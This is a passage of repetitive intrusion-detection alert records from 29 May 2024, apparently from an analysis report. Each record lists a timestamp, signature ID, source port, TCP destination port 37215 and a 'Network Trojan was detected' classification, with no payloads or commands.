                Timestamp:05/29/24-15:15:55.900506
                SID:2829579
                Source Port:58686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023567
                SID:2829579
                Source Port:56692
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141868
                SID:2829579
                Source Port:58872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076517
                SID:2829579
                Source Port:44958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420432
                SID:2829579
                Source Port:49562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782686
                SID:2835222
                Source Port:49950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897094
                SID:2835222
                Source Port:34106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767423
                SID:2835222
                Source Port:34172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531294
                SID:2835222
                Source Port:34266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267590
                SID:2835222
                Source Port:33088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655202
                SID:2829579
                Source Port:50208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643755
                SID:2829579
                Source Port:57204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263886
                SID:2829579
                Source Port:47874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547241
                SID:2829579
                Source Port:58962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.818165
                SID:2835222
                Source Port:34222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184414
                SID:2829579
                Source Port:35212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.020599
                SID:2835222
                Source Port:57444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211899
                SID:2829579
                Source Port:51560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.094033
                SID:2835222
                Source Port:59634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947292
                SID:2829579
                Source Port:34376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236180
                SID:2829579
                Source Port:42002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418127
                SID:2835222
                Source Port:34512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.033955
                SID:2829579
                Source Port:45470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667099
                SID:2835222
                Source Port:39526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898295
                SID:2835222
                Source Port:39194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628503
                SID:2835222
                Source Port:34888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916101
                SID:2829579
                Source Port:57622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916784
                SID:2829579
                Source Port:51844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928152
                SID:2829579
                Source Port:32922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074484
                SID:2829579
                Source Port:46664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332421
                SID:2829579
                Source Port:51238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514201
                SID:2829579
                Source Port:56092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901464
                SID:2835222
                Source Port:47366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948757
                SID:2835222
                Source Port:58094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964962
                SID:2829579
                Source Port:52394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274377
                SID:2829579
                Source Port:37306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664396
                SID:2829579
                Source Port:53080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778164
                SID:2835222
                Source Port:38914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.788385
                SID:2835222
                Source Port:42098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982900
                SID:2835222
                Source Port:59102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180399
                SID:2829579
                Source Port:43528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520490
                SID:2829579
                Source Port:46362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374401
                SID:2835222
                Source Port:33814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834746
                SID:2829579
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039746
                SID:2835222
                Source Port:35158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427524
                SID:2835222
                Source Port:41058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287583
                SID:2829579
                Source Port:40748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166715
                SID:2835222
                Source Port:33182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100655
                SID:2835222
                Source Port:35418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278098
                SID:2835222
                Source Port:45118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978137
                SID:2829579
                Source Port:47962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555349
                SID:2835222
                Source Port:56184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.663461
                SID:2829579
                Source Port:55740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858871
                SID:2835222
                Source Port:36780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899008
                SID:2829579
                Source Port:55412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947486
                SID:2829579
                Source Port:46616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764383
                SID:2835222
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817960
                SID:2835222
                Source Port:52364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660492
                SID:2835222
                Source Port:53804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971794
                SID:2835222
                Source Port:47026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.331037
                SID:2829579
                Source Port:47046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967272
                SID:2835222
                Source Port:48532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795990
                SID:2829579
                Source Port:49092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655220
                SID:2835222
                Source Port:59058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610112
                SID:2829579
                Source Port:58112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531645
                SID:2835222
                Source Port:47338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472322
                SID:2829579
                Source Port:53876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872755
                SID:2835222
                Source Port:56792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287502
                SID:2829579
                Source Port:57126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292082
                SID:2835222
                Source Port:41796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075011
                SID:2829579
                Source Port:43976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742752
                SID:2829579
                Source Port:39166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503539
                SID:2829579
                Source Port:52882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791730
                SID:2835222
                Source Port:55554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461527
                SID:2835222
                Source Port:48384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931565
                SID:2835222
                Source Port:49994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172037
                SID:2835222
                Source Port:33300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559747
                SID:2829579
                Source Port:32908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652441
                SID:2835222
                Source Port:54540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.742223
                SID:2829579
                Source Port:50870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986776
                SID:2829579
                Source Port:49778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447121
                SID:2835222
                Source Port:60278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653970
                SID:2835222
                Source Port:50424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499884
                SID:2835222
                Source Port:41752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179017
                SID:2835222
                Source Port:52580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.955291
                SID:2829579
                Source Port:56790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362449
                SID:2829579
                Source Port:58454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944651
                SID:2829579
                Source Port:37662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215650
                SID:2829579
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415712
                SID:2829579
                Source Port:40036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438195
                SID:2829579
                Source Port:60682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664004
                SID:2835222
                Source Port:34350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334650
                SID:2829579
                Source Port:59854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386207
                SID:2835222
                Source Port:53550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668740
                SID:2829579
                Source Port:49768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505340
                SID:2829579
                Source Port:48718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948582
                SID:2835222
                Source Port:46926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854649
                SID:2835222
                Source Port:35786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336538
                SID:2835222
                Source Port:55924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886224
                SID:2835222
                Source Port:58938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238986
                SID:2829579
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652074
                SID:2829579
                Source Port:57764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133994
                SID:2835222
                Source Port:54442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362968
                SID:2829579
                Source Port:57652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660111
                SID:2829579
                Source Port:55062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528539
                SID:2835222
                Source Port:34930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136910
                SID:2835222
                Source Port:35998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072802
                SID:2829579
                Source Port:53192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500717
                SID:2835222
                Source Port:58842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.575723
                SID:2835222
                Source Port:42570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989982
                SID:2829579
                Source Port:49950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872997
                SID:2829579
                Source Port:44018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465958
                SID:2835222
                Source Port:57430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855153
                SID:2835222
                Source Port:44126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665693
                SID:2835222
                Source Port:45666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660413
                SID:2835222
                Source Port:46546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855608
                SID:2829579
                Source Port:60842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325272
                SID:2829579
                Source Port:37254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728349
                SID:2835222
                Source Port:50932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597009
                SID:2829579
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931257
                SID:2835222
                Source Port:59786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721264
                SID:2835222
                Source Port:50094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.024910
                SID:2829579
                Source Port:52320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266353
                SID:2835222
                Source Port:35644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617578
                SID:2829579
                Source Port:56194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111732
                SID:2835222
                Source Port:37388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.511125
                SID:2829579
                Source Port:42360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915440
                SID:2835222
                Source Port:33182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572001
                SID:2829579
                Source Port:50906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360288
                SID:2829579
                Source Port:54244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228974
                SID:2829579
                Source Port:54820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681676
                SID:2835222
                Source Port:39152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739154
                SID:2829579
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.739803
                SID:2835222
                Source Port:52066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286729
                SID:2829579
                Source Port:33620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941678
                SID:2829579
                Source Port:58350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912927
                SID:2829579
                Source Port:60208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869530
                SID:2829579
                Source Port:52560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229167
                SID:2835222
                Source Port:54116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782904
                SID:2829579
                Source Port:32912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854145
                SID:2835222
                Source Port:39276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462433
                SID:2829579
                Source Port:51608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.914860
                SID:2835222
                Source Port:34590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984733
                SID:2835222
                Source Port:45854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226753
                SID:2829579
                Source Port:33446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.326112
                SID:2829579
                Source Port:48194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732806
                SID:2829579
                Source Port:57902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171450
                SID:2835222
                Source Port:34814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639882
                SID:2829579
                Source Port:39426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870281
                SID:2835222
                Source Port:32844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861590
                SID:2835222
                Source Port:43824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438713
                SID:2829579
                Source Port:33770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721693
                SID:2829579
                Source Port:56532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584035
                SID:2829579
                Source Port:55776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161015
                SID:2829579
                Source Port:37326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787152
                SID:2835222
                Source Port:34628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.505397
                SID:2835222
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811577
                SID:2829579
                Source Port:42364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712865
                SID:2829579
                Source Port:40984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630016
                SID:2829579
                Source Port:53492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574260
                SID:2829579
                Source Port:43018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655725
                SID:2835222
                Source Port:43928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2835222
                Source Port:40652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977247
                SID:2835222
                Source Port:40780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783471
                SID:2829579
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.808445
                SID:2835222
                Source Port:50246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.337348
                SID:2829579
                Source Port:54668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029810
                SID:2835222
                Source Port:43964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687844
                SID:2829579
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740272
                SID:2829579
                Source Port:34032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265632
                SID:2835222
                Source Port:33710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.820998
                SID:2835222
                Source Port:48600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286076
                SID:2835222
                Source Port:33178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773285
                SID:2835222
                Source Port:51020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853344
                SID:2829579
                Source Port:36758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074935
                SID:2835222
                Source Port:50322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.938933
                SID:2829579
                Source Port:43978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559251
                SID:2835222
                Source Port:56000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944533
                SID:2835222
                Source Port:60156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809296
                SID:2829579
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091367
                SID:2835222
                Source Port:40340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.942924
                SID:2835222
                Source Port:60244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908426
                SID:2835222
                Source Port:46790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883617
                SID:2835222
                Source Port:54198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441499
                SID:2829579
                Source Port:49532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796757
                SID:2829579
                Source Port:48674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420108
                SID:2835222
                Source Port:40492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227661
                SID:2835222
                Source Port:46810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965694
                SID:2829579
                Source Port:56592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.569491
                SID:2829579
                Source Port:45600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886127
                SID:2829579
                Source Port:50208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.854586
                SID:2829579
                Source Port:53348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324321
                SID:2835222
                Source Port:44608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858934
                SID:2829579
                Source Port:52314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363222
                SID:2835222
                Source Port:46326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265383
                SID:2829579
                Source Port:39568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278665
                SID:2829579
                Source Port:50770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519498
